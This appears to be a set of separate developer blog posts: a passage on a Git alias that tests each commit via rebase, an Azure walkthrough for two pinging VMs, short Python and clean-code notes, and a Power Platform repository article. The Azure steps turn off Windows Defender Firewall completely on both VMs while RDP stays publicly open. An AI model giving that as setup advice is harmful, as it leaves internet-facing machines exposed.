![](https://peateasea.de/assets/images/git-test-fork-command-details.png) which–along with the detailed explanations below–I hope aids understanding of the alias code above. ### A big shell function Let’s focus on the full `test-fork` alias. In essence, this command uses `git rebase` to execute a command (via the `-x` option) on each commit from a given base commit. This is a very long command, and as far as Git is concerned, this command is all one line. However, to make it easier to edit within the `.gitconfig` file, I’ve split it across several lines by using trailing backslashes (`\`). On the left-hand side of the equals sign is the name of the alias: `test-fork`. On the right-hand side is where all the action is happening: a shell function that Git runs when the user enters the command ```shell $ git test-fork ``` within a Git repository. We define the shell function within a large double-quoted string, and hence we have to be careful when embedding double quotes. The exclamation mark at the beginning means that [Git treats the alias as a shell command](https://git-scm.com/docs/git-config/) and hence it won’t prefix the alias by the `git` command as would be the case without the exclamation mark. The shell function has this form: ```shell f() { ... code ... }; f ``` meaning that we define the function and then immediately run it. The semicolon separates the function definition from its call; by entering `f` at the end we call the function that we just defined. ### Defining the test command to run The first line of the function is ```shell [x$# = x1] && testcmd=\"$1\" || testcmd='make test' ``` This code tests to see if we have an argument and if so, sets the variable `testcmd` to its value (i.e. the variable `$1`). Otherwise, we set `testcmd` to the default value of `make test`. In other words, if you run ```shell $ git test-fork 'some-test-command' ``` then `some-test-command` will test each commit in your branch. If you don’t specify a command explicitly, then the alias falls back to using `make test`. The variable `$#` is a [special parameter in Bash](https://www.gnu.org/software/bash/manual/bash.html#Special-Parameters) and expands to the number of positional parameters. In other words, if there is a single argument, `$#` will be the value `1` and the test ```shell [x$# = x1] ``` will evaluate as true. The code will then take the first branch of this implicit `if` block (i.e. the bit after `&&`) setting `testcmd` to the value passed in on the command line and using this as the test command for the rest of the code in the shell function. ### The origin of branches The next line in the function is ```shell upstream_base_branch=$(git branch --remotes | grep 'origin/\\(HEAD\\|master\\|main\\)' | cut -d'>' -f2 | head -n 1) ``` which determines the name of the upstream (a.k.a. `origin`) branch from which the local feature branch is based. This information will later help us work out where the feature branch forked off from the main line of development. This is the first Git-related command, which I’ve indicated by the number ① and the colour blue in the diagram above. This line runs the command within the `$()` and returns its result as the value of the variable. The `$()` is a Bash feature called [command substitution](https://www.gnu.org/software/bash/manual/html_node/Command-Substitution.html) and > allows the output of a command to replace the command itself. The command ```shell $ git branch --remotes ``` returns a list of all locally-known remote branches. The one we’re interested in is either `origin/master` or `origin/main`, or what `origin/HEAD` is currently pointing to. The output from `git branch --remotes` can be different in certain situations. Usually, you will see output like the following: ```shell $ git branch --remotes origin/HEAD -> origin/master origin/master origin/rename-blah-to-fasl origin/refactor-foo-baa ``` where we have a reference `origin/HEAD` which points to the actual upstream main branch, which in this case is `origin/master`. In other situations (and I haven’t been able to work out exactly why; I think this has to do with sharing an upstream repository with others, but I’m not sure), the output omits a pointer from `origin/HEAD` to the main remote branch, giving e.g. ```shell $ git branch --remotes origin/main ``` where I’ve used the now more common `main` name for the main branch in the upstream repository. The filtering commands after `git branch --remotes` handle both situations. By filtering on `HEAD`, `master` or `main` with the `grep` command, we ensure that all variations are in the filtered output. The `cut` extracts the reference that `origin/HEAD` is pointing to (if `origin/HEAD` exists in the output) and the `head` ensures we only select the first entry should there be multiple matches. If `origin/HEAD` doesn’t exist in the output, the `cut` passes its output to `head` and we again select the first entry in the list of appropriate upstream branch names. When constructing `grep` regular expressions in the shell, we have to escape Boolean-or expressions (the pipe character `|`) and groups (parentheses, `()`) with a backslash (`\`). In the case we have here, we have to “escape the escape character” within the Git alias by using two backslashes (`\\`). Thus, when Git passes the command to the shell, there is only a single backslash character present and the regular expression is formed correctly. After all this hard work, the variable `upstream_base_branch` contains the name of the upstream base branch. ### Where are we now? The third line in our shell function ```shell current_branch=$(git rev-parse --abbrev-ref HEAD) ``` finds out the name of the current branch. I.e. this is the name of the feature branch that we want to test. I’ve highlighted this information by the number ② and the colour green in the diagram above. We use this information, along with the upstream branch’s name, to work out where the current branch forked from the main line of development. This is the purpose of the next line. ### Where did we fork’n come from? Now we’re in a position to work out where the feature branch forked<sup id="fnref:could-say-branched" role="doc-noteref"><a href="#fn:could-say-branched" rel="footnote">3</a></sup> from the main line of development. In particular, we want to find the commit id of this fork point. Hence the next line of code assigns a variable called `fork_point`: ```shell fork_point=$(git merge-base --fork-point $upstream_base_branch $current_branch) ``` The [`git merge-base` command](https://git-scm.com/docs/git-merge-base) > finds the best common ancestor(s) between two commits to use in a three-way merge. When using the `--fork-point` option, the command takes the form ``` git merge-base --fork-point <ref> [<commit>] ``` The `--fork-point` option is key for us here because it finds > the point at which a branch (or any history that leads to `<commit>`) forked from another branch (or any reference) `<ref>`. In our case, we use `git merge-base` to find the commit at which the `current_branch` diverged from `upstream_base_branch`. I’ve denoted this with the number ③ and the colour red in the diagram above. It was a fair bit of work to get to this point, but now we’re in a position to use `git rebase` to run our tests. ### Skip to the commit, my darling Now we get to the very heart of the matter: iterating over each commit in the branch and running the test command on each commit as we go. I’ve referenced this process by the orange number ④ and arrows in the diagram above. We run the test command via the [`-x/--exec` argument to `git rebase`](https://git-scm.com/docs/git-rebase#Documentation/git-rebase.txt--xltcmdgt): ```shell git rebase $fork_point -x \"git log -1 --oneline; $testcmd\" ``` Here, we rebase the branch we are currently on (i.e. the feature branch) onto where it forked from the upstream base branch. Note that `git rebase` operates on a reference which exists upstream and [aborts the rebase if there is no upstream configured](https://git-scm.com/docs/git-rebase#_description). This is why we use the upstream base branch when [working out the fork point](#where-did-we-forkn-come-from). Also, the upstream branch is usually the branch used for comparisons to the feature branch when submitting a pull request on systems such as GitHub, GitLab, Gitea, etc. Thus it makes sense to consider the state of the upstream’s `main` branch rather than the local `main` branch’s current state. The `-x` option takes a string argument of the shell command to run. In our case here, we need to escape the double quotes so that they don’t conflict with the quotes enclosing the entire alias code. Doing so ensures that quotes still enclose the command to run for each commit in the rebase process. Note that we need double quotes here as well so that the value of `$testcmd` is interpolated into the command ultimately executed by `git rebase`. To provide context for the test command, and to indicate where the `git rebase` process currently is, we precede it with ``` git log -1 --oneline ``` This [prints the abbreviated commit id and subject line](https://git-scm.com/docs/git-log#Documentation/git-log.txt---oneline) on a single line for the current commit, which can be useful to know if the test command fails. Finally, we run the test command defined in the variable `$testcmd`. This is either the command specified as an argument to `git test-fork` or is `make test` if no arguments were given. ## That’s it! That’s the guts of the `test-fork` alias in detail. Clear as mud? Ok, let’s see the command in action and hopefully its use and utility will make more sense. ## `git test-fork` in action Sometimes it’s easier to understand what’s going on if one sees something run. I can’t do that dynamically here, but I can show a representative example. ### A quick but detailed example Here’s an example from a Python project where I was wanting to reduce [technical debt](https://en.wikipedia.org/wiki/Technical_debt) with the aid of the [`pylint` code checker](https://www.pylint.org/). I’d used `pylint` to sniff out any code smells which might need addressing and had a few commits on a feature branch which had fixed these issues. I now wanted to make sure that I’d not broken anything in the process, hence I wanted to run the test suite on each commit in the feature branch. Since I have a `Makefile` which wraps the actual test command behind a simple `test` target, I only needed to run `git test-fork`. This is the output: ```shell $ git test-fork Executing: git log -1 --oneline; make test 8e6ff5b (HEAD) Fix import ordering make --directory=src test make[1]: Entering directory '/home/cochrane/a-python-project/src' . ../venv/bin/activate; pytest ============================= test session starts ============================= <snip-lots-of-test-output> ======================= 257 passed in 239.65s (0:03:59) ======================= make[1]: Leaving directory '/home/cochrane/a-python-project/src' Executing: git log -1 --oneline; make test 2c5c1d9 (HEAD) Remove unnecessary "dunder" calls make --directory=src test make[1]: Entering directory '/home/cochrane/a-python-project/src' . ../venv/bin/activate; pytest ============================= test session starts ============================= <snip-lots-of-test-output> ======================= 257 passed in 248.33s (0:04:08) ======================= make[1]: Leaving directory '/home/cochrane/a-python-project/src' Executing: git log -1 --oneline; make test bccc026 (HEAD) Remove reimported module make --directory=src test make[1]: Entering directory '/home/cochrane/a-python-project/src' . ../venv/bin/activate; pytest ============================= test session starts ============================= <snip-lots-of-test-output> ======================= 257 passed in 254.63s (0:04:14) ======================= make[1]: Leaving directory '/home/cochrane/a-python-project/src' Successfully rebased and updated refs/heads/address-technical-debt. ``` There are a few things to note about the output: - `git rebase` echoes the command it’s running: `Executing: git log -1 --oneline; make test`. This lets us check that Git is running the command we want it to run. - We see the `git log -1 --oneline` output fairly clearly. Bash displays this with nice, bright colours and is easy to see in the terminal. Unfortunately, I couldn’t reproduce that here though. Sorry. :confused: - `make` changes into the `src/` directory to then run the `test` target within that directory: `make --directory=src test` and `make[1]: Entering directory '/home/cochrane/a-python-project/src'`. - Now we see the `pytest` invocation that `make test` runs. - There is _lots_ of output from `pytest`. I’ve removed a lot so we can focus on the main points in this discussion. - We see that the tests passed, yay! :tada: - `make` returns to the original directory after the commands in the `test` target have completed successfully: `make[1]: Leaving directory '/home/cochrane/a-python-project/src'`. - Git checks out the next commit on the feature branch and the process repeats. ### Rebase starts from the base Note that the rebase command starts running from the project’s base directory. This is independent of where you run the `git test-fork` command. So, if you want to run `pytest` on an individual file, you’ll need to explicitly change into the appropriate directory as part of the test command. In other words, if you have to be in the `src/` directory to run a single test like this: ```shell $ pytest tests/test_views.py ``` then using ```shell $ git test-fork 'pytest tests/test_views/py' ``` won’t work, because `git rebase` operates from the base directory and `pytest` won’t be able to find the files. Also, using the full path to the test file by running ```shell $ git test-fork 'pytest src/tests/test_views/py' ``` probably won’t work. At least, it doesn’t work in my case because I have a `pytest.ini` file which `pytest` reads and it’s in the `src/` dir. Thus, the only command that will allow you to run individual test files in such a situation is: ```shell $ git test-fork 'cd src && pytest tests/test_file.py' ``` where each command execution by `git rebase` also changes into the required directory to run the individual test file. Running this command has output much like the detailed output included above. ### Common usage variations Other common invocations I use are: ```shell $ git test-fork 'make lint' ``` which runs the linter checks on the entire codebase for each commit in the branch. Also, I tend to use this one a lot: ```shell $ git test-fork 'make test && make lint' ``` which runs the full test suite and the linter checks for each commit in the feature branch. Note that we can chain commands in the argument passed to `git test-fork` by using the Bash Boolean-and operator: `&&`. ### What to do if things go wrong Nobody’s perfect and something could go wrong in the middle of the rebase process. Actually, this is exactly what we’re trying to do: we _want_ to sniff out any problems before they make their way upstream into a pull request. This way we avoid our colleagues from having to stumble across problems when reviewing the code. So what happens if the test suite fails in the middle of a rebase? Git interrupts the rebase. That’s all. Actually, it’s great: you’re dropped right into the middle of where the problem is, which is the best place to be able to fix it. After fixing the issue, run `make test` (or the equivalent command) to check that everything now works. Add the changes with ```shell $ git add -p ``` or use `git add` on each of the files. Then it’s simply a matter of amending the commit ```shell $ git commit --amend ``` before then continuing the rebase with: ```shell $ git rebase --continue ``` Or, if things look to be too complicated and you might need some thinking time, just abort: ```shell $ git rebase --abort ``` Then, take a step back, take a deep breath, and dig in again. ## Wrapping up The `test-fork` alias can be really helpful in finding test or linting issues locally before pushing code to colleagues or collaborators. I’m fairly sure this code could be improved upon. Still, it works well for my purposes and is a standard part of my process to provide high-quality work to internal teams and external customers. So what are you waiting for? Go test that forking code! 1. I’m available for freelance Python/Perl backend development and maintenance work. Contact me at [paul@peateasea.de](mailto:paul@peateasea.de) and let’s discuss how I can help solve your business’ hairiest problems. [↩](#fnref:hire-me) 2. Of course, “they” could have been an earlier you! [↩](#fnref:they-could-be-you) 3. I could have said “branched” here, but the phrase “a branch branched” sounded a bit odd. [↩](#fnref:could-say-branched)
peateasea
1,917,982
Creating a Virtual Network with Two Virtual Machines that can ping each other.
How to create a virtual network that consists of two virtual machines that can communicate with each other.
0
2024-07-12T21:46:36
https://dev.to/tundeiness/creating-a-virtual-network-with-two-virtual-machines-that-can-ping-each-other-3056
azure, virtualnetwork, virtualmachines, subnet
--- title: Creating a Virtual Network with Two Virtual Machines that can ping each other. published: true description: How to create a virtual network that consists of two virtual machines that can communicate with each other. tags: Azure, VirtualNetwork, VirtualMachines, Subnet cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6zdqhzl861ueljv7k6lt.jpg # Use a ratio of 100:42 for best results. # published_at: 2024-07-10 02:37 +0000 --- #INTRODUCTION Today I will be writing about how to create a Virtual Network with Two Virtual Machines that can ping each other. This process involves setting up a virtual environment where multiple virtual machines (VMs) can communicate seamlessly, mimicking a real-world network setup. In this article, I will walk through the steps necessary to create a virtual network and configure two virtual machines to ensure they can successfully ping each other, demonstrating effective connectivity and interaction within the virtualized environment. ##STEP 1: CREATE A VIRTUAL NETWORK & A SUBNET - From the Azure Portal home page, at the top left corner of the page, click the hamburger (menu) button. ![menu](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tuw5esmgoxryd11f4vyz.png) - select **virtual networks** from the sidebar. ![virtual networks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/85qnebix30pl2vws1dsd.png) - Click **+create** at the top of the create network page. ![+Create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5aqo45p951f4q5q6gau6.png) - At the **Basics** tab, under **Project details** and at the **Resource group** label, click **create new** link. Provide a name for the resource group and click **Ok**. ![Basics](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/il1n839ibwjngh0fgrbm.png) ![Create new](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a3e9zaio92rza1pcy45h.png) - Under the **instance details** label, provide a **name** for the network and select a suitable **Region**. ![Instance details](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/o6ai7qd1y567bah9tydn.png) - Click the **IP Addresses** tab at the top of the page, to add a subnet. ![IP Addresses](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qi39vrjo1wy3h4kqedmn.png) - At the dropdown menu displayed above the **address space** box on the displayed page, check that the dropdown is set to **Add IPv4 address space** ![drop-down menu above address space box](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vrjpj8dliysbann6b38u.png) - In the address space box, change **Subnet address range** to **10.1.0.0/16** (This is usually the default IP address so you may not need to change it in this instance). - locate the pen icon at the bottom corner, in the address space box (next to the garbage can icon). Click on this icon to edit the default **Subnet** name/add a subnet. ![address space box](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ai4o02hnuoh4ixttpy4h.png) - Leave the **Subnet Purpose** at **Default**. ![Subnet purpose](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/elln9ojmsnmgjamtchaj.png) - Change Subnet **name** to **vnet1-subnet**. ![Change subnet name](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a0jgkebv9oheg858alvv.png) - Also, change **Subnet address range** to **10.1.0.0/24** using the **size** label. Leave all other settings as their defaults. - Click **Add** to close the **Add a Subnet** pane. This completes the creation of the subnet. ![change subnet address range and click add](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sizaykobs8oh6p8ucho7.png) - Click **Review + create** to run validation. ![Review + create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i56dnr2ouwlfpta855y2.png) - When you see the notification that Validation passed, click the **Create** button to deploy the Virtual Network. ![create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/f7khnlfx6sjcsss29zh5.png) ![deployment in progress](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2gox92vsdpfk0kv4d0n1.png) ![deployment is complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gcwfe0wlxmhut5qcsi0v.png) ##STEP 2: CREATE TWO VIRTUAL MACHINES IN THE NETWORK (VIRTUAL NETWORK) - After the virtual network deployment is complete click **Go to resource**. ![Go to resource](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xp2o4jv1mycye14d2ago.png) - Click the hamburger menu button (top left of the page) and select **virtual machines**. ![menu button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3pf4d71njnncckqwy9n0.png) ![select virtual machines](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9xelx4a1ib0rxnvf7n83.png) - Click **+ Create** icon and then select **Virtual machine**. ![create virtual machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5zvode4rzgd6b0vz9oqq.png) - On the **Basics** tab, at the **Project details** and at the **Resource group** label, select the resource group created earlier from the drop-down list of resource groups. This is the deployment ID. ![select the resource group created earlier from the list of resource groups](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pmal872tj7wn36u6ecun.png) - At the **Instance details** heading and the **Virtual machine name** click the input box and name the virtual machine as **vm1**. ![virtual machine name](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/72ials2uxuy6cakjynl6.png) - At the **Region** label select a suitable region. In this case, I selected **East US**. ![Region](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nrx0b11rqg2g4ur1b1v9.png) - Set **Availability options** to **No infrastructure redundancy required** ![Availability options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vb76vi7olsxs54p5f69v.png) - Set **Security type** to **Standard**. ![Security type](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4sx89ouwcpiw329m5mor.png) - At the **Image** label, select **windows server 2019 Datacenter - Gen 2**. ![Image](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/by24cubwe7gx9qt2sl9o.png) - set **vm architecture** to **x64**. ![VM Architecture](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/50ynlut80i05t8ouxrgu.png) - Next, untick **Run with Azure spot discount** ![Run with Azure spot discount](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aftzori572edjvfcz66g.png) - Then, set **size** to **Standard_Dc4ads_cc_v5..**. At times the size required may not be listed. If this happens select the **see all sizes** link. This will take you to another page to select a VM size. ![Size](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ou78l9pedrgreghveqge.png) - Do not **Enable Hibernation**. In my case Hibernation isn't supported for my VM **size**. ![Enable Hibernation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5t6vf4ptr8tmjr2dyugc.png) - At the **Administrator account** heading, select a **Username** and **Password**. Also **confirm password** by re-typing the password in the input box at the **confirm password** label. (These are the details that will be required to access the Virtual machines when it is in operation.) ![Administrator account](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gc4hunm8wzwk6y57bzwd.png) - At the **Inbound port rules** heading leave the **Public inbound ports** set at the default. - set **select inbound ports** to default which is RDP(3389). ![Inbound port rules](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8c3kcp70lf320jq1o62e.png) - Do not tick the **Licensing section** as well. ![Licensing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mitz1hv6dewjtpdenhva.png) - Click the **networking** tab at the top of the page. Make sure that **vm1** is placed on the **Vnet1-subnet** virtual network. - Click **Review + create** to validate the configurations. ![Review + create](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xb43xo7kv7v5tmio1c63.png) - When you see the notification that Validation passed, click the **Create** button to deploy the first Virtual Machine. ![deploy virtual machine](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r7czkgwu5tmlxfzmytzf.png) ![deploying](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ljmp4he22k96k9jeq3k6.png) ![deployment in progress](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/hv5ecz9d24wjpna66i50.png) ![deployment complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bcfy48a3sf24dgrxnscz.png) - Next, create the Second virtual machine in the same virtual network following the steps listed under this heading. Make sure the second Virtual machine has a different name and a different IP address for networking. ##STEP 3: TEST THE CONNECTIONS - to view the deployed virtual machines, search for virtual machines in the search bar at the top of the page. - At the listing, click **vm1** to open it. ![Select vm1](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sn4b5lfeewh231m8wv7v.png) - at **vm1** overview page, you will notice that the status is *Running*. Click the IP address link at the **Public IP address** label to increase the timeout settings. You can check [here](https://dev.to/tundeiness/setting-up-a-windows-11-virtual-machine-with-azure-on-a-macos-88m) to see how it is done. This is one of the industry's best practices. However, I didn’t increase the Timeout for my virtual machine in this article. - Still at the **vm1** overview page, click **Connect** at the top of the page. ![connect](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0dyhydv8owyf4fq3iv7d.png) - Select **Download RDP file**. ![Download RDP file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/96s3cmi8hjct10pe19p9.png) - Open the downloaded RDP file for **vm1**. ![Open the downloaded RDP file](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vnmg65jylpdpuh9bkf5c.png) - When prompted, click **connect**. - Provide the credentials created for **administrator account** while creating **vm1** virtual machine. Provide the **password** and click **ok**. ![Provide the credentials](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0sz7vy4568is6ufiz13i.png) - You may receive a certificate warning prompt. Click **continue** to create the connection to your deployed virtual machine. ![certificate warning prompt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4hewm345yan78xms9196.png) - Follow the same process listed above to also open **vm2**. - Now that both virtual machines are open, go to **vm1** interface. Click on the **search** button icon at the bottom of the page. ![search button](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5y0xiiz33fep7v7ooeew.png) - Type *firewall*. - Select *windows defender firewall* in the search results. ![windows defender firewall](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s5wzhszhnnmv33i751e9.png) - Click **turn Windows Defender Firewall on or off** ![turn Windows Defender Firewall on or off](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vr686ljs5zsab2kkcwj6.png) - Modify the firewall setting by clicking **turn off windows defender firewall** for **Private network settings** and **Public network settings** - click **Ok**. ![Modify the firewall setting](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kz5gho82hrevdjimxjih.png) ![Modify the firewall setting II](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/n075z1c2d3o2hsb57cf2.png) - Disable the firewall for **vm2** just like it was done for **vm1**. - Next, in **vm1** click **search** icon at the bottom of the page and search for **powershell** ![search for powershell](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0toc1jcie6a2nv2aekvt.png) - Select **PowerShell** from the search result listing. - After PowerShell completes launching, type **ping vm2** into the interface. ![Ping vm2](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9ye303cz1ky2rtohyzu.png) - If you can see the following display in the image below, that means the connection was successful. I have successfully pinged **vm2** from **vm1**. ![Successful pinging](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/msb4y4xt4t3ac7x1osj5.png) #CONCLUSION In this article we have done the following: - Created a Virtual Network and a Subnet - Deployed two virtual Machines onto the virtual network - Configured them to allow one virtual machine to ping the other within that virtual network, and - Tested the connection of the two virtual machines in the network. Another article about virtual networks in Azure can be found [here](https://dev.to/tundeiness/how-to-deploy-a-hub-virtual-network-in-azure-14cj) Photo by <a href="https://unsplash.com/@theshubhamdhage?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Shubham Dhage</a> on <a href="https://unsplash.com/photos/a-black-and-white-photo-of-a-bunch-of-cubes-gC_aoAjQl2Q?utm_content=creditCopyText&utm_medium=referral&utm_source=unsplash">Unsplash</a>
tundeiness
1,917,993
Python : Intro
கடந்த 08.07.2024 ஆம் தேதி கணியம் அறக்கட்டளையால் எடுக்கப்பட்ட இணைய வழி பைத்தான் அறிமுக வகுப்பில்...
0
2024-07-13T03:21:30
https://dev.to/jokergosha/python-intro-3njm
python, coding
கடந்த 08.07.2024 ஆம் தேதி கணியம் அறக்கட்டளையால் எடுக்கப்பட்ட இணைய வழி பைத்தான் அறிமுக வகுப்பில் கலந்து கொண்டேன். > பைத்தான் நிரலாக்கம் மொழியானது எளிதில் புரிந்து கொள்ளக்கூடிய வகையில் உள்ளது. **Applications of Python:** -Scripting -to Automate the process for everyday tasks -Web development -Data Analysis -Machine Learning -to create Software testing tools -to develop AI and more _இந்த வகுப்பில் நான் பைத்தான் நிரலாக்க மொழியை கணினியில் எவ்வாறு நிறுவ வேண்டும் என்பதை தெரிந்து கொண்டேன்._
jokergosha
1,918,266
Why your Power Platform Setup Needs a Repo
A Repo (repository) is simply a place to store what you develop. Github is probably the most famous...
20,311
2024-07-15T06:18:04
https://dev.to/wyattdave/why-your-power-platform-setup-needs-a-repo-3eg
powerplatform, powerapps, powerautomate, lowcode
A Repo (repository) is simply a place to store what you develop. Github is probably the most famous repository (though it does more then just that), but there are others like BitBucket, Artificatory and Assembla. It can be stored as code (editable individual files) or packages (aka artifacts), there are multiple benefits but the main are: - Source control (different save versions) - Redudenancy (back up) - Multi dev working (split/merge different versions) - Integrated Deployments (Dev/Test/Prod) So the question you are now asking is why would I need a repo in the Power Platform, my Apps and even flows now, have version history. Each environment has a copy of the solution, and I store copies when I manually deploy or through Pipeline (A copy of the solution is stored in Dataverse). But there are a few reasons, and it is also easier then you think, so lets dive in. 1. Why - whats the benefits 2. How to setup --- ## 1. Why - whats the benefits **Connections** There is one big big problem in the Power Platform, that also happens to be its biggest strength, connections. Conenctions are great, you use your own so no messing around setting up spn's ([Service Principle Name](https://learn.microsoft.com/en-us/entra/identity-platform/app-objects-and-service-principals?tabs=browser)), but now we have a problem, they are your connections. Which means we really shouldnt be sharing ([hacked by power automate and how to avoid it](https://dev.to/wyattdave/hacked-by-power-automate-and-how-to-avoid-it-3052)), this is fine in Default on your personal solutions, but what about when its a business solution. If you want other devs to be able to update/maintain the flows/apps you have to give them access to your connections, which not only causes security issues but can cause export issues (if a flow uses a different persons connection reference, you can't see it in the solution so will export without it, causeing dependency issues). And this is where a repo comes in, once development is finished it is uploaded to the repo and deleted from the environment. Next dev who needs to work on it simply downloads and imports with their connections. ![repo process](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kajofhk946zbnlojk72x.png) **Code Consistency** I have seen far to often a solution deployed to prod, the develeoper then 'tinkers' with the dev version trying new things out. They stop and forget, when a new update is required these unlogged changes cause unexpected behaviour and bugs. Or the flip side there is a bug in prod and you can't recreate it in dev as you are actually working on a different version. Again going to the repo ensures you are always working off the right version. **House Keeping** Dev environments can get very very messy very quickly. It can become hard top navigate and monitor on. Not to forget that it is all stored in Dataverse, which we have limited capacity (and it is not cheap to buy more). One solution is to burn the environment (delete after x days), and this is a good solution, but means you really need a repo even more else solutiosn could be lost. Storing in a repo keeps your dev environment tidy and will most likely save you money in the long run. **Back ups** Although Power Platform environments do have recorvery back ups it is good practice to diversify your storage. Storing on different platforms ensures you do not lose your data if any accidents/disaters happen. It also helps from personal errors (A dev deletes a solution by mistake, a environment rollback would then wipe any other developers work since back up).   ![backups](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0cv2x2mxvqh9i199hvps.png) --- ## 2. How to setup There are 2 main ways to store your solution, as code or as an artifact. If you want to go the code route then for Power Apps you would need to use the Git version control (its been in experimental for 2 years+ now) that integrates directly with Github, I wont go into this as there is good documentation [here](https://learn.microsoft.com/en-us/power-apps/maker/canvas-apps/git-version-control). For Power Automate you have more options as at its core it is row in a Dataverse table ([workflows](https://learn.microsoft.com/en-us/power-apps/developer/data-platform/reference/entities/workflow)), so you can store it in any database. You would also need to do the same for Connection Referenes, Environment Variables and other components. All do-able (Ive gone into detail whats in a solution [here](https://dev.to/wyattdave/everything-you-didnt-know-you-needed-to-know-about-power-platform-solutions-1b4)), but I would strongly recommend going with the easier artifact approach. In this approach we let the Power Platform do all the packing and we just download the completed zip file with everything we need. As we are just storing a zip file it can be anywhere, so the easy one is obviously SharePoint, but if you want to do it properly I would still recommend somewhere like Artifactory. The Dataverse api has the [ExportSolution Action](https://learn.microsoft.com/en-us/power-apps/developer/data-platform/webapi/reference/exportsolution?view=dataverse-latest) which creates the solution export. You pass in some key information and it returns the zip file. So its easy to integrate with pro code solutions, but the easier way is to leverage Power Automate and the Dataverse Unbound Action (which calls the same api). The below example exports the solution and creates an item in a SharePoint list. It stores some key information and a unique reference (run Guid). It then attaches the export to the item. ![export flow](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xo7btkuq4i9mug3texmw.png) This can be called when needed (like when dev finishes for the he day), on a schedule, or during the deployment process. ![trigger options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/eqc13c29er56zpudb1k2.png) --- Repos can be thought of another 'burden' to maintain, with a 'its low code so I dont need pro code processes approach' or 'Its all do before me by Microsoft', but what we should really be looking at is the value. If the solution has high value, then we need to be risk adverse, and this is when established pro code processes like ALM (Application Lifecycle Management) and repos come in (why re-invet the wheel).
wyattdave
1,918,273
Clean Coding research
Jul 10th Internship journal: Today, I researched about the basic concepts of clean coding, a term...
28,067
2024-07-10T10:33:52
https://dev.to/dongdiri96/clean-coding-1787
**Jul 10th Internship journal:** Today, I researched about the basic concepts of clean coding, a term that refers to the code format with high readability and efficiency. The team could potentially use this introductory information for designing the website we will create. For better understanding, I tried to read Robert C. Martin’s original book. However, with a lack of background knowledge, the later parts–like data structures, boundaries, and unit tests–were hard to grasp, and thus could not be included in the summary. I felt the vital need to do further research to effectively contribute to the project. **Jul 12th** Today I researched about static program analysis and looked at some example programs that help this. ##클린 코드란?## 클린 코드는 미국의 프로그래머 Robert C. Martin이 그의 책에서 사용한 용어로, 명확하고 간결하여 이해하기 쉬운 코드를 의미합니다. 이는 코드의 가독성, 유지 보수성, 효율성을 높여주기 때문에 소프트웨어 개발에서 매우 중요한 개념입니다. ##왜 클린 코드가 필요한가요?## 다른 사람들이 코드를 쉽게 이해하고 수정할 수 있기 때문에 팀워크가 원활하고 효과적으로 이루어집니다. 또한, 코드를 이해하기 쉬우면 버그를 훨씬 더 쉽게 찾고 수정할 수 있습니다. 따라서 장기적으로 봤을 때 많은 개발 비용을 절감할 수 있으며, 팀의 생산성을 크게 향상시킵니다. ##클린코딩의 원칙## 클린 코딩의 원칙들을 간단한 예시와 함께 몇 가지만 살펴 보겠습니다. **1.이름을 정확하게 지어라** 변수, 함수,또는 클래스의 이름을 통해 왜 존재 이유와 역할을 정확히 알 수 있어야 합니다. ``` def c(a, b): s = 0 for i in range(a, b + 1): s += i return s x = 1 y = 10 result = c(x, y) print(result) ``` ``` def calculate_sum_of_range(start, end): total_sum = 0 for number in range(start, end + 1): total_sum += number return total_sum start_number = 1 end_number = 10 sum_result = calculate_sum_of_range(start_number, end_number) print(sum_result) ``` 위의 코드보다는 아래의 코드가 